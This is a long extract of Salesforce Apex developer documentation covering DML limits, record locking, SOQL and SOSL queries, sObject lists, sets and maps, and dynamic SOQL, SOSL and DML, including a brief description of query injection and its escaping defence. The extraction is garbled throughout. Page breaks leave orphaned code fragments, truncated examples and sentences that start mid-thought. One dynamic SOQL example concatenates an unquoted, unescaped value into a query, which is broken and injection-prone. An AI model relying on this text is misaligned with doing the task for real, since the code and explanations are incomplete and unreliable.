You can pass a maximum of 10,000 sObject records to a single insert, update, delete, and undelete method.
Each upsert statement consists of two operations, one for inserting records and one for updating records. Each of these operations
is subject to the runtime limits for insert and update, respectively. For example, if you upsert more than 10,000 records and
all of them are being updated, you receive an error. (See Understanding Execution Governors and Limits on page 258)
Upsert and Foreign Keys
You can use foreign keys to upsert sObject records if they have been set as reference fields. For more information, see Field Types
in the Object Reference for Salesforce and Force.com.
Creating Records for Multiple Object Types
As with the SOAP API, you can create records in Apex for multiple object types, including custom objects, in one DML call with API
version 20.0 and later. For example, you can create a contact and an account in one call. You can create records for up to 10 object
types in one call.
Records are saved in the same order that theyre entered in the sObject input array. If youre entering new records that have a
parent-child relationship, the parent record must precede the child record in the array. For example, if youre creating a contact that
references an account thats also being created in the same call, the account must have a smaller index in the array than the contact
does. The contact references the account by using an External ID field.
You cant add a record that references another record of the same object type in the same call. For example, the Contact object has
a Reports To field thats a reference to another contact. You cant create two contacts in one call if one contact uses the
Reports To field to reference a second contact in the input array. You can create a contact that references another contact that
has been previously created.
Records for multiple object types are broken into multiple chunks by Salesforce. A chunk is a subset of the input array, and each
chunk contains records of one object type. Data is committed on a chunk-by-chunk basis. Any Apex triggers that are related to the
records in a chunk are invoked once per chunk. Consider an sObject input array that contains the following set of records:
account1, account2, contact1, contact2, contact3, case1, account3, account4, contact4
130
Locking Records
Each call can process up to 10 chunks. If the sObject array contains more than 10 chunks, you must process the records in more than
one call. For additional information about this feature, see Creating Records for Different Object Types in the SOAP API Developer's
Guide.
Note: For Apex, the chunking of the input array for an insert or update DML operation has two possible causes: the existence
of multiple object types or the default chunk size of 200. If chunking in the input array occurs because of both of these reasons,
each chunk is counted toward the limit of 10 chunks. If the input array contains only one type of sObject, you wont hit this
limit. However, if the input array contains at least two sObject types and contains a high number of objects that are chunked
into groups of 200, you might hit this limit. For example, if you have an array that contains 1,001 consecutive leads followed
by 1,001 consecutive contacts, the array will be chunked into 12 groups: Two groups are due to the different sObject types of
Lead and Contact, and the remaining are due to the default chunking size of 200 objects. In this case, the insert or update
operation returns an error because you reached the limit of 10 chunks in hybrid arrays. The workaround is to call the DML
operation for each object type separately.
DML and Knowledge Objects
To execute DML code on knowledge articles (KnowledgeArticleVersion types such as the custom FAQ__kav article type), the running
user must have the Knowledge User feature license. Otherwise, calling a class method that contains DML operations on knowledge
articles results in errors. If the running user isnt a system administrator and doesnt have the Knowledge User feature license, calling
any method in the class returns an error even if the called method doesnt contain DML code for knowledge articles but another
method in the class does. For example, the following class contains two methods, only one of which performs DML on a knowledge
article. A non-administrator non-knowledge user who calls the doNothing method will get the following error: DML operation
UPDATE not allowed on FAQ__kav
As a workaround, cast the input array to the DML statement from an array of FAQ__kav articles to an array of the generic sObject
type as follows:
public void DMLOperation() {
FAQ__kav[] articles = [SELECT id FROM FAQ__kav WHERE PublishStatus = 'Draft' and
Language = 'en_US'];
update (sObject[]) articles;
}
Locking Records
Locking Statements
Apex allows you to lock sObject records while theyre being updated in order to prevent race conditions and other thread safety problems.
While an sObject record is locked, no other client or user is allowed to make updates either through code or the Salesforce user interface.
131
Locking Records
The client locking the records can perform logic on the records and make updates with the guarantee that the locked records wont be
changed by another client during the lock period. The lock gets released when the transaction completes.
To lock a set of sObject records in Apex, embed the keywords FOR UPDATE after any inline SOQL statement. For example, the following
statement, in addition to querying for two accounts, also locks the accounts that are returned:
Account [] accts = [SELECT Id FROM Account LIMIT 2 FOR UPDATE];
Note: You cant use the ORDER BY keywords in any SOQL query that uses locking.
Locking Considerations
While the records are locked by a client, the locking client can modify their field values in the database in the same transaction. Other
clients have to wait until the transaction completes and the records are no longer locked before being able to update the same
records. Other clients can still query the same records while theyre locked.
If you attempt to lock a record currently locked by another client, you will get a QueryException. Similarly, if you attempt to
update a record currently locked by another client, you will get a DmlException.
If a client attempts to modify a locked record, the update operation might succeed if the lock gets released within a short amount
of time after the update call was made. In this case, it is possible that the updates will overwrite those made by the locking client if
the second client obtained an old copy of the record. To prevent this from happening, the second client must lock the record first.
The locking process returns a fresh copy of the record from the database through the SELECT statement. The second client can
use this copy to make new updates.
Warning: Use care when setting locks in your Apex code. See Avoiding Deadlocks.
As discussed in SOQL For Loops, the example above corresponds internally to calls to the query() and queryMore() methods
in the SOAP API.
Note that there is no commit statement. If your Apex trigger completes successfully, any database changes are automatically committed.
If your Apex trigger does not complete successfully, any changes made to the database are rolled back.
Avoiding Deadlocks
Apex has the possibility of deadlocks, as does any other procedural logic language involving updates to multiple database tables or
rows. To avoid such deadlocks, the Apex runtime engine:
1. First locks sObject parent records, then children.
2. Locks sObject records in order of ID when multiple records of the same type are being edited.
As a developer, use care when locking rows to ensure that you are not introducing deadlocks. Verify that you are using standard deadlock
avoidance techniques by accessing tables and rows in the same order from all locations in an application.
132
SOQL Statements
SOQL statements evaluate to a list of sObjects, a single sObject, or an Integer for count method queries.
For example, you could retrieve a list of accounts that are named Acme:
List<Account> aa = [SELECT Id, Name FROM Account WHERE Name = 'Acme'];
You can also create new objects from SOQL queries on existing ones. The following example creates a new contact for the first account
with the number of employees greater than 10:
Contact c = new Contact(Account = [SELECT Name FROM Account
WHERE NumberOfEmployees > 10 LIMIT 1]);
c.FirstName = 'James';
c.LastName = 'Yoyce';
Note that the newly created object contains null values for its fields, which will need to be set.
The count method can be used to return the number of rows returned by a query. The following example returns the total number
of contacts with the last name of Weissman:
Integer i = [SELECT COUNT() FROM Contact WHERE LastName = 'Weissman'];
For a full description of SOQL query syntax, see the Salesforce SOQL and SOSL Reference Guide.
SOSL Statements
SOSL statements evaluate to a list of lists of sObjects, where each list contains the search results for a particular sObject type. The result
lists are always returned in the same order as they were specified in the SOSL query. If a SOSL query does not return any records for a
specified sObject type, the search results include an empty list for that sObject.
For example, you can return a list of accounts, contacts, opportunities, and leads that begin with the phrase map:
List<List<SObject>> searchList = [FIND 'map*' IN ALL FIELDS RETURNING Account (Id, Name),
Contact, Opportunity, Lead];
Note: The syntax of the FIND clause in Apex differs from the syntax of the FIND clause in the SOAP API:
In Apex, the value of the FIND clause is demarcated with single quotes. For example:
FIND 'map*' IN ALL FIELDS RETURNING Account (Id, Name), Contact, Opportunity, Lead
133
In the Force.com API, the value of the FIND clause is demarcated with braces. For example:
FIND {map*} IN ALL FIELDS RETURNING Account (Id, Name), Contact, Opportunity, Lead
From searchList, you can create arrays for each object returned:
Account [] accounts = ((List<Account>)searchList[0]);
Contact [] contacts = ((List<Contact>)searchList[1]);
Opportunity [] opportunities = ((List<Opportunity>)searchList[2]);
Lead [] leads = ((List<Lead>)searchList[3]);
For a full description of SOSL query syntax, see the Salesforce SOQL and SOSL Reference Guide.
The following is the same code example rewritten so it does not produce a runtime error. Note that Name has been added as part of
the select statement, after Id.
insert new Account(Name = 'Singha');
Account acc = [SELECT Id FROM Account WHERE Name = 'Singha' LIMIT 1];
// Note that name is now selected
String name = [SELECT Id, Name FROM Account WHERE Name = 'Singha' LIMIT 1].Name;
Even if only one sObject field is selected, a SOQL or SOSL query always returns data as complete records. Consequently, you must
dereference the field in order to access it. For example, this code retrieves an sObject list from the database with a SOQL query, accesses
the first account record in the list, and then dereferences the record's AnnualRevenue field:
Double rev = [SELECT AnnualRevenue FROM Account
WHERE Name = 'Acme'][0].AnnualRevenue;
// When only one result is returned in a SOQL query, it is not necessary
// to include the list's index.
Double rev2 = [SELECT AnnualRevenue FROM Account
WHERE Name = 'Acme' LIMIT 1].AnnualRevenue;
The only situation in which it is not necessary to dereference an sObject field in the result of an SOQL query, is when the query returns
an Integer as the result of a COUNT operation:
Integer i = [SELECT COUNT() FROM Account];
134
Note: The expression c.Account.Name, as well as any other expression that traverses a relationship, displays slightly different
characteristics when it is read as a value than when it is modified:
When being read as a value, if c.Account is null, then c.Account.Name evaluates to null, but does not yield a
NullPointerException. This design allows developers to navigate multiple relationships without the tedium of having
to check for null values.
When being modified, if c.Account is null, then c.Account.Name does yield a NullPointerException.
In addition, the sObject field key can be used with insert, update, or upsert to resolve foreign keys by external ID. For example:
Account refAcct = new Account(externalId__c = '12345');
Contact c = new Contact(Account = refAcct, LastName = 'Kay');
insert c;
This inserts a new contact with the AccountId equal to the account with the external_id equal to 12345. If there is no such
account, the insert fails.
135
Tip: The following code is equivalent to the code above. However, because it uses a SOQL query, it is not as efficient. If this code
was called multiple times, it could reach the execution limit for the maximum number of SOQL queries. For more information on
execution limits, see Understanding Execution Governors and Limits on page 258.
Account refAcct = [SELECT Id FROM Account WHERE externalId__c='12345'];
Contact c = new Contact(Account = refAcct.Id);
insert c;
Additionally, parent-child relationships in sObjects act as SOQL queries as well. For example:
for (Account a : [SELECT Id, Name, (SELECT LastName FROM Contacts)
FROM Account
WHERE Name = 'Acme']) {
Contact[] cons = a.Contacts;
}
//The following example also works because we limit to only 1 contact
for (Account a : [SELECT Id, Name, (SELECT LastName FROM Contacts LIMIT 1)
FROM Account
WHERE Name = 'testAgg']) {
Contact c = a.Contacts;
}
Note that any query that includes an aggregate function returns its results in an array of AggregateResult objects. AggregateResult is a
read-only sObject and is only used for query results.
Aggregate functions become a more powerful tool to generate reports when you use them with a GROUP BY clause. For example,
you could find the average Amount for all your opportunities by campaign.
AggregateResult[] groupedResults
= [SELECT CampaignId, AVG(Amount)
FROM Opportunity
136
GROUP BY CampaignId];
for (AggregateResult ar : groupedResults) {
System.debug('Campaign ID' + ar.get('CampaignId'));
System.debug('Average amount' + ar.get('expr0'));
}
Any aggregated field in a SELECT list that does not have an alias automatically gets an implied alias with a format expri, where i
denotes the order of the aggregated fields with no explicit aliases. The value of i starts at 0 and increments for every aggregated field
with no explicit alias. For more information, see Using Aliases with GROUP BY in the Salesforce SOQL and SOSL Reference Guide.
Note: Queries that include aggregate functions are subject to the same governor limits as other SOQL queries for the total number
of records returned. This limit includes any records included in the aggregation, not just the number of rows returned by the query.
If you encounter this limit, you should add a condition to the WHERE clause to reduce the amount of records processed by the
query.
Instead, use a SOQL query for loop as in one of the following examples:
// Use this format if you are not executing DML statements
// within the for loop
for (Account a : [SELECT Id, Name FROM Account
WHERE Name LIKE 'Acme%']) {
// Your code without DML statements here
}
// Use this format for efficiency if you are executing DML statements
// within the for loop
for (List<Account> accts : [SELECT Id, Name FROM Account
WHERE Name LIKE 'Acme%']) {
// Your code here
update accts;
}
The following example demonstrates a SOQL query for loop used to mass update records. Suppose you want to change the last name
of a contact across all records for contacts whose first and last names match a specified criteria:
public void massUpdate() {
for (List<Contact> contacts:
[SELECT FirstName, LastName FROM Contact]) {
for(Contact c : contacts) {
if (c.FirstName == 'Barbara' &&
c.LastName == 'Gordon') {
c.LastName = 'Wayne';
}
}
update contacts;
137
}
}
Instead of using a SOQL query in a for loop, the preferred method of mass updating records is to use batch Apex, which minimizes
the risk of hitting governor limits.
For more information, see SOQL For Loops on page 143.
The CONTAINS operator is used in the filter and the number of rows to be scanned exceeds 333,333. This is because the
CONTAINS operator requires a full scan of the index. Note that this threshold is subject to change.
When comparing with an empty value (Name != '')
However, there are other complex scenarios in which custom indexes won't be used. Contact your Salesforce representative if
your scenario isn't covered by these cases or if you need further assistance with non-selective queries.
Examples of Selective SOQL Queries
To better understand whether a query on a large object is selective or not, let's analyze some queries. For these queries, we will
assume there are more than 100,000 records (including soft-deleted records, that is, deleted records that are still in the Recycle Bin)
for the Account sObject.
Query 1:
SELECT Id FROM Account WHERE Id IN (<list of account IDs>)
138
The WHERE clause is on an indexed field (Id). If SELECT COUNT() FROM Account WHERE Id IN (<list of
account IDs>) returns fewer records than the selectivity threshold, the index on Id is used. This will typically be the case since
the list of IDs only contains a small amount of records.
Query 2:
SELECT Id FROM Account WHERE Name != ''
Since Account is a large object even though Name is indexed (primary key), this filter returns most of the records, making the query
non-selective.
Query 3:
SELECT Id FROM Account WHERE Name != '' AND CustomField__c = 'ValueA'
Here we have to see if each filter, when considered individually, is selective. As we saw in the previous example the first filter isn't
selective. So let's focus on the second one. If the count of records returned by SELECT COUNT() FROM Account WHERE
CustomField__c = 'ValueA' is lower than the selectivity threshold, and CustomField__c is indexed, the query is selective.
139
Another approach would be to use the TYPEOF clause in the SOQL SELECT statement. This example also queries Events that are
related to an Account or Opportunity via the What field.
List<Event> = [SELECT TYPEOF What WHEN Account THEN Phone WHEN Opportunity THEN Amount END
FROM Event];
Note: TYPEOF is currently available as a Developer Preview as part of the SOQL Polymorphism feature. For more information
on enabling TYPEOF for your organization, contact Salesforce.
These queries will return a list of sObjects where the relationship field references the desired object types.
If you need to access the referenced object in a polymorphic relationship, you can use the instanceof keyword to determine the object
type. The following example uses instanceof to determine whether an Account or Opportunity is related to an Event.
Event myEvent = eventFromQuery;
if (myEvent.What instanceof Account) {
// myEvent.What references an Account, so process accordingly
} else if (myEvent.What instanceof Opportunity) {
140
Note that you must assign the referenced sObject that the query returns to a variable of the appropriate type before you can pass it to
another method. The following example queries for User or Group owners of Merchandise__c custom objects using a SOQL query with
a TYPEOF clause, uses instanceof to determine the owner type, and then assigns the owner objects to User or Group type
variables before passing them to utility methods.
public class PolymorphismExampleClass {
// Utility method for a User
public static void processUser(User theUser) {
System.debug('Processed User');
}
// Utility method for a Group
public static void processGroup(Group theGroup) {
System.debug('Processed Group');
}
public static void processOwnersOfMerchandise() {
// Select records based on the Owner polymorphic relationship field
List<Merchandise__c> merchandiseList = [SELECT TYPEOF Owner WHEN User THEN LastName
WHEN Group THEN Email END FROM Merchandise__c];
// We now have a list of Merchandise__c records owned by either a User or Group
for (Merchandise__c merch: merchandiseList) {
// We can use instanceof to check the polymorphic relationship type
// Note that we have to assign the polymorphic reference to the appropriate
// sObject type before passing to a method
if (merch.Owner instanceof User) {
User userOwner = merch.Owner;
processUser(userOwner);
} else if (merch.Owner instanceof Group) {
Group groupOwner = merch.Owner;
processGroup(groupOwner);
}
}
}
}
141
142
= 'aaa';
= 'bbb';
11;
= 'ccc';
22;
You can use ALL ROWS to query records in your organization's Recycle Bin. You cannot use the ALL ROWS keywords with the FOR
UPDATE keywords.
code_block
}
or
for (variable_list : [soql_query]) {
code_block
}
Both variable and variable_list must be of the same type as the sObjects that are returned by the soql_query.
As in standard SOQL queries, the [soql_query] statement can refer to code expressions in their WHERE clauses using the :
syntax. For example:
String s = 'Acme';
for (Account a : [SELECT Id, Name from Account
where Name LIKE :(s+'%')]) {
143
// Your code
}
The following example combines creating a list from a SOQL query, with the DML update method.
// Create a list of account records from a SOQL query
List<Account> accs = [SELECT Id, Name FROM Account WHERE Name = 'Siebel'];
// Loop through the list and update the Name field
for(Account a : accs){
a.Name = 'Oracle';
}
// Update the database
update accs;
144
sObject Collections
Note:
The break and continue keywords can be used in both types of inline query for loop formats. When using the sObject
list format, continue skips to the next list of sObjects.
DML statements can only process up to 10,000 records at a time, and sObject list for loops process records in batches of
200. Consequently, if you are inserting, updating, or deleting more than one record per returned record in an sObject list for
loop, it is possible to encounter runtime limit errors. See Understanding Execution Governors and Limits on page 258.
You might get a QueryException in a SOQL for loop with the message Aggregate query has too many
rows for direct assignment, use FOR loop. This exception is sometimes thrown when accessing a large
set of child records of a retrieved sObject inside the loop, or when getting the size of such a record set. To avoid getting this
exception, use a for loop to iterate over the child records, as follows.
Integer count=0;
for (Contact c : returnedAccount.Contacts) {
count++;
// Do some other processing
}
sObject Collections
Lists of sObjects
Lists can contain sObjects among other types of elements. Lists of sObjects can be used for bulk processing of data.
You can use a list to store sObjects. Lists are useful when working with SOQL queries. SOQL queries return sObject data and this data
can be stored in a list of sObjects. Also, you can use lists to perform bulk operations, such as inserting a list of sObjects with one call.
To declare a list of sObjects, use the List keyword followed by the sObject type within <> characters. For example:
// Create an empty list of Accounts
List<Account> myList = new List<Account>();
145
Lists of sObjects
Bulk Processing
You can bulk-process a list of sObjects by passing a list to the DML operation. This example shows how you can insert a list of accounts.
// Define the list
List<Account> acctList = new List<Account>();
// Create account sObjects
Account a1 = new Acount(Name='Account1');
Account a2 = new Acount(Name='Account2');
// Add accounts to the list
acctList.add(a1);
acctList.add(a2);
// Bulk insert the list
insert acctList;
Record ID Generation
Apex automatically generates IDs for each object in a list of sObjects when the list is successfully inserted or upserted into the database
with a data manipulation language (DML) statement. Consequently, a list of sObjects cannot be inserted or upserted if it contains the
same sObject more than once, even if it has a null ID. This situation would imply that two IDs would need to be written to the same
structure in memory, which is illegal.
For example, the insert statement in the following block of code generates a ListException because it tries to insert a list
with two references to the same sObject (a):
try {
// Create a list with two references to the same sObject element
Account a = new Account();
List<Account> accs = new List<Account>{a, a};
146
These are some additional examples of using the array notation with sObject lists.
Example
List<Account> accts = new Account[]{};
Description
Defines an Account list with no elements.
Defines an Account list with memory allocated for three Accounts,
including a new Account object in the first position, null in the
second position, and another new Account object in the third
position.
Defines the Contact list with a new list.
(otherList);
147
This example is similar to the previous one, except that it uses the Merchandise__c custom object. This example shows how the Name
field is used to place the Notebooks merchandise ahead of Pens in the list. Since there are two merchandise sObjects with the Name
field value of Pens, the Description field is used to sort these remaining merchandise items because the Description field comes before
the Price and Total_Inventory fields in alphabetical order.
Merchandise__c[] merchList = new List<Merchandise__c>();
merchList.add( new Merchandise__c(
Name='Pens',
Description__c='Red pens',
Price__c=2,
Total_Inventory__c=1000));
148
149
}
}
This example provides a test for the OpportunityWrapper class. It sorts a list of OpportunityWrapper objects and verifies
that the list elements are sorted by the opportunity amount.
@isTest
private class OpportunityWrapperTest {
static testmethod void test1() {
// Add the opportunity wrapper objects to a list.
OpportunityWrapper[] oppyList = new List<OpportunityWrapper>();
Date closeDate = Date.today().addDays(10);
oppyList.add( new OpportunityWrapper(new Opportunity(
Name='Edge Installation',
CloseDate=closeDate,
StageName='Prospecting',
Amount=50000)));
oppyList.add( new OpportunityWrapper(new Opportunity(
Name='United Oil Installations',
CloseDate=closeDate,
StageName='Needs Analysis',
Amount=100000)));
oppyList.add( new OpportunityWrapper(new Opportunity(
Name='Grand Hotels SLA',
CloseDate=closeDate,
StageName='Prospecting',
Amount=25000)));
// Sort the wrapper objects using the implementation of the
// compareTo method.
oppyList.sort();
// Verify the sort order
System.assertEquals('Grand Hotels SLA', oppyList[0].oppy.Name);
System.assertEquals(25000, oppyList[0].oppy.Amount);
System.assertEquals('Edge Installation', oppyList[1].oppy.Name);
System.assertEquals(50000, oppyList[1].oppy.Amount);
System.assertEquals('United Oil Installations', oppyList[2].oppy.Name);
System.assertEquals(100000, oppyList[2].oppy.Amount);
// Write the sorted list contents to the debug log.
System.debug(oppyList);
}
}
150
Sets of Objects
The list is populated with one element by the new statement {new Account(name='Acme')}.
Item 0, the first item in the list, is then accessed by the next part of the string [0].
The name of the sObject in the list is accessed, followed by the method returning the length name.length().
In the following example, a name that has been shifted to lower case is returned. The SOQL statement returns a list of which the first
element (at index 0) is accessed through [0]. Next, the Name field is accessed and converted to lowercase with this expression
.Name.toLowerCase().
String nameChange = [SELECT Name FROM Account][0].Name.toLowerCase();
Sets of Objects
Sets can contain sObjects among other types of elements.
Sets contain unique elements. Uniqueness of sObjects is determined by comparing the objects fields. For example, if you try to add two
accounts with the same name to a set, with no other fields set, only one sObject is added to the set.
// Create two accounts, a1 and a2
Account a1 = new account(name='MyAccount');
Account a2 = new account(name='MyAccount');
// Add both accounts to the new set
Set<Account> accountSet = new Set<Account>{a1, a2};
// Verify that the set only contains one item
System.assertEquals(accountSet.size(), 1);
If you add a description to one of the accounts, it is considered unique and both accounts are added to the set.
// Create two accounts, a1 and a2, and add a description to a2
Account a1 = new account(name='MyAccount');
Account a2 = new account(name='MyAccount', description='My test account');
// Add both accounts to the new set
Set<Account> accountSet = new Set<Account>{a1, a2};
// Verify that the set contains two items
System.assertEquals(accountSet.size(), 2);
Warning: If set elements are objects, and these objects change after being added to the collection, they wont be found anymore
when using, for example, the contains or containsAll methods, because of changed field values.
Maps of sObjects
Map keys and values can be of any data type, including sObject types, such as Account.
Maps can hold sObjects both in their keys and values. A map key represents a unique value that maps to a map value. For example, a
common key would be an ID that maps to an account (a specific sObject type). This example shows how to define a map whose keys
are of type ID and whose values are of type Account.
Map<ID, Account> m = new Map<ID, Account>();
151
Maps of sObjects
As with primitive types, you can populate map key-value pairs when the map is declared by using curly brace ({}) syntax. Within the
curly braces, specify the key first, then specify the value for that key using =>. This example creates a map of integers to accounts lists
and adds one entry using the account list created earlier.
Account[] accs = new Account[5]; // Account[] is synonymous with List<Account>
Map<Integer, List<Account>> m4 = new Map<Integer, List<Account>>{1 => accs};
Maps allow sObjects in their keys. You should use sObjects in the keys only when the sObject field values wont change.
One common usage of this map type is for in-memory joins between two tables.
152
Dynamic Apex
a1 => 1};
// Get a1's value from the map.
// Returns the value of 1.
System.assertEquals(1, m.get(a1));
// Id field is null.
System.assertEquals(null, a1.Id);
// Insert a1.
// This causes the ID field on a1 to be auto-filled
insert a1;
// Id field is now populated.
System.assertNotEquals(null, a1.Id);
// Get a1's value from the map again.
// Returns null because Map.get(sObject) doesn't find
// the entry based on the sObject with an auto-filled ID.
// This is because when a1 was originally added to the map
// before the insert operation, the ID of a1 was null.
System.assertEquals(null, m.get(a1));
Another scenario where sObject fields are autofilled is in triggers, for example, when using before and after insert triggers for an sObject.
If those triggers share a static map defined in a class, and the sObjects in Trigger.New are added to this map in the before trigger,
the sObjects in Trigger.New in the after trigger arent found in the map because the two sets of sObjects differ by the fields that
are autofilled. The sObjects in Trigger.New in the after trigger have system fields populated after insertion, namely: ID, CreatedDate,
CreatedById, LastModifiedDate, LastModifiedById, and SystemModStamp.
Dynamic Apex
Dynamic Apex enables developers to create more flexible applications by providing them with the ability to:
Access sObject and field describe information
Describe information provides metadata information about sObject and field properties. For example, the describe information for
an sObject includes whether that type of sObject supports operations like create or undelete, the sObject's name and label, the
sObject's fields and child objects, and so on. The describe information for a field includes whether the field has a default value,
whether it is a calculated field, the type of the field, and so on.
Note that describe information provides information about objects in an organization, not individual records.
Access Salesforce app information
You can obtain describe information for standard and custom apps available in the Salesforce user interface. Each app corresponds
to a collection of tabs. Describe information for an app includes the apps label, namespace, and tabs. Describe information for a tab
includes the sObject associated with the tab, tab icons and colors.
Write dynamic SOQL queries, dynamic SOSL queries and dynamic DML
Dynamic SOQL and SOSL queries provide the ability to execute SOQL or SOSL as a string at runtime, while dynamic DML provides the
ability to create a record dynamically and then insert it into the database using DML. Using dynamic SOQL, SOSL, and DML, an
application can be tailored precisely to the organization as well as the user's permissions. This can be useful for applications that are
installed from Force.com AppExchange.
153
The following algorithm shows how you can work with describe information in Apex:
1. Generate a list or map of tokens for the sObjects in your organization (see Accessing All sObjects.)
2. Determine the sObject you need to access.
3. Generate the describe result for the sObject.
4. If necessary, generate a map of field tokens for the sObject (see Accessing All Field Describe Results for an sObject.)
5. Generate the describe result for the field the code needs to access.
154
In the following example, the token for the Account sObject is returned:
Schema.sObjectType t = Account.sObjectType;
This example can be used to determine whether an sObject or a list of sObjects is of a particular type:
// Create a generic sObject variable s
SObject s = Database.query('SELECT Id FROM Account LIMIT 1');
// Verify if that sObject variable is an Account token
System.assertEquals(s.getSObjectType(), Account.sObjectType);
// Create a list of generic sObjects
List<sObject> sobjList = new Account[]{};
// Verify if the list of sObjects contains Account tokens
System.assertEquals(sobjList.getSObjectType(), Account.sObjectType);
Some standard sObjects have a field called sObjectType, for example, AssignmentRule, QueueSObject, and RecordType. For these
types of sObjects, always use the getSObjectType method for retrieving the token. If you use the property, for example,
RecordType.sObjectType, the field is returned.
The following example uses the Schema sObjectType static member variable:
Schema.DescribeSObjectResult dsr = Schema.SObjectType.Account;
For more information about the methods available with the sObject describe result, see DescribeSObjectResult Class.
155
In the following example, the field token is returned from the field describe result:
// Get the describe result for the Name field on the Account object
Schema.DescribeFieldResult dfr = Schema.sObjectType.Account.fields.Name;
// Verify that the field token is the token for the Name field on an Account object
System.assert(dfr.getSObjectField() == Account.Name);
// Get the describe result from the token
dfr = dfr.getSObjectField().getDescribe();
In the example above, the system uses special parsing to validate that the final member variable (Name) is valid for the specified sObject
at compile time. When the parser finds the fields member variable, it looks backwards to find the name of the sObject (Account)
and validates that the field name following the fields member variable is legitimate. The fields member variable only works
when used in this manner.
Note: You should not use the fields member variable without also using either a field member variable name or the getMap
method. For more information on getMap, see the next section.
For more information about the methods available with a field describe result, see DescribeFieldResult Class.
156
The following example generates a map that can be used to access a field by name:
Map<String, Schema.SObjectField> fieldMap = Schema.SObjectType.Account.fields.getMap();
Note: The value type of this map is not a field describe result. Using the describe results would take too many system resources.
Instead, it is a map of tokens that you can use to find the appropriate field. After you determine the field, generate the describe
result for it.
The map has the following characteristics:
It is dynamic, that is, it is generated at runtime on the fields for that sObject.
All field names are case insensitive.
The keys use namespaces as required.
The keys reflect whether the field is a custom object.
For example, if the code block that generates the map is in namespace N1, and a field is also in N1, the key in the map is represented as
MyField__c. However, if the code block is in namespace N1, and the field is in namespace N2, the key is N2__MyField__c.
In addition, standard fields have no namespace prefix.
157
158
Starting with Apex saved using Salesforce API version 28.0, the keys in the map that getGlobalDescribe returns are always
prefixed with the namespace, if any, of the code in which it is running. For example, if the code block that makes the
getGlobalDescribe call is in namespace NS1, and a custom object named MyObject__c is in the same namespace, the key
returned is NS1__MyObject__c. For Apex saved using earlier API versions, the key contains the namespace only if the namespace
of the code block and the namespace of the sObject are different. For example, if the code block that generates the map is in namespace
N1, and an sObject is also in N1, the key in the map is represented as MyObject__c. However, if the code block is in namespace N1,
and the sObject is in namespace N2, the key is N2__MyObject__c.
159
160
161
162
This example tests the describeDataCategoryGroupStructures method. It ensures that the returned category group,
categories and associated objects are correct.
@isTest
private class DescribeDataCategoryGroupStructuresTest {
public static testMethod void getDescribeDataCategoryGroupStructureResultsTest(){
List<Schema.DescribeDataCategoryGroupStructureResult> describeResult =
DescribeDataCategoryGroupStructures.getDescribeDataCategoryGroupStructureResults();
System.assert(describeResult.size() == 2,
'The results should only contain 2 results: ' + describeResult.size());
//Creating category info
163
164
Dynamic SOQL
this.label = l;
}
public String getName(){
return this.name;
}
public String getLabel(){
return this.label;
}
}
}
Dynamic SOQL
Dynamic SOQL refers to the creation of a SOQL string at runtime with Apex code. Dynamic SOQL enables you to create more flexible
applications. For example, you can create a search based on input from an end user, or update records with varying field names.
To create a dynamic SOQL query at runtime, use the database query method, in one of the following ways:
Return a single sObject when the query returns a single record:
sObject s = Database.query(string_limit_1);
Return a list of sObjects when the query returns more than a single record:
List<sObject> sobjList = Database.query(string);
The database query method can be used wherever an inline SOQL query can be used, such as in regular assignment statements and
for loops. The results are processed in much the same way as static SOQL queries are processed.
Dynamic SOQL results can be specified as concrete sObjects, such as Account or MyCustomObject__c, or as the generic sObject data
type. At runtime, the system validates that the type of the query matches the declared type of the variable. If the query does not return
the correct sObject type, a runtime error is thrown. This means you do not need to cast from a generic sObject to a concrete sObject.
Dynamic SOQL queries have the same governor limits as static queries. For more information on governor limits, see Understanding
Execution Governors and Limits on page 258.
For a full description of SOQL query syntax, see Salesforce Object Query Language (SOQL) in the Force.com SOQL and SOSL Reference.
However, unlike inline SOQL, dynamic SOQL cant use bind variable fields in the query string. The following example isnt supported and
results in a Variable does not exist error:
MyCustomObject__c myVariable = new MyCustomObject__c(field1__c ='TestField');
List<sObject> sobjList = Database.query('SELECT Id FROM MyCustomObject__c WHERE field1__c
= :myVariable.field1__c');
165
Dynamic SOSL
You can instead resolve the variable field into a string and use the string in your dynamic SOQL query:
String resolvedField1 = myVariable.field1__c;
List<sObject> sobjList = Database.query('SELECT Id FROM MyCustomObject__c WHERE field1__c
= ' + resolvedField1);
SOQL Injection
SOQL injection is a technique by which a user causes your application to execute database methods you did not intend by passing SOQL
statements into your code. This can occur in Apex code whenever your application relies on end user input to construct a dynamic SOQL
statement and you do not handle the input properly.
To prevent SOQL injection, use the escapeSingleQuotes method. This method adds the escape character (\) to all single quotation
marks in a string that is passed in from a user. The method ensures that all single quotation marks are treated as enclosing strings, instead
of database commands.
Dynamic SOSL
Dynamic SOSL refers to the creation of a SOSL string at run time with Apex code. Dynamic SOSL enables you to create more flexible
applications. For example, you can create a search based on input from an end user, or update records with varying field names.
To create a dynamic SOSL query at run time, use the search query method. For example:
List<List <sObject>> myQuery = search.query(SOSL_search_string);
Dynamic SOSL statements evaluate to a list of lists of sObjects, where each list contains the search results for a particular sObject type.
The result lists are always returned in the same order as they were specified in the dynamic SOSL query. From the example above, the
results from Account are first, then Contact, then Lead.
The search query method can be used wherever an inline SOSL query can be used, such as in regular assignment statements and
for loops. The results are processed in much the same way as static SOSL queries are processed.
Dynamic SOSL queries have the same governor limits as static queries. For more information on governor limits, see Understanding
Execution Governors and Limits on page 258.
For a full description of SOSL query syntax, see Salesforce Object Search Language (SOSL) in the Force.com SOQL and SOSL Reference.
SOSL Injection
SOSL injection is a technique by which a user causes your application to execute database methods you did not intend by passing SOSL
statements into your code. This can occur in Apex code whenever your application relies on end user input to construct a dynamic SOSL
statement and you do not handle the input properly.
To prevent SOSL injection, use the escapeSingleQuotes method. This method adds the escape character (\) to all single quotation
marks in a string that is passed in from a user. The method ensures that all single quotation marks are treated as enclosing strings, instead
of database commands.
166
Dynamic DML
Dynamic DML
In addition to querying describe information and building SOQL queries at runtime, you can also create sObjects dynamically, and insert
them into the database using DML.
To create a new sObject of a given type, use the newSObject method on an sObject token. Note that the token must be cast into a
concrete sObject type (such as Account). For example:
// Get a new account
Account a = new Account();
// Get the token for the account
Schema.sObjectType tokenA = a.getSObjectType();
// The following produces an error because the token is a generic sObject, not an Account
// Account b = tokenA.newSObject();
// The following works because the token is cast back into an Account
Account b = (Account)tokenA.newSObject();
Though the sObject token tokenA is a token of Account, it is considered an sObject because it is accessed separately. It must be cast
back into the concrete sObject type Account to use the newSObject method. For more information on casting, see Classes and
Casting on page 87.
You can also specify an ID with newSObject to create an sObject that references an existing record that you can update later. For
example:
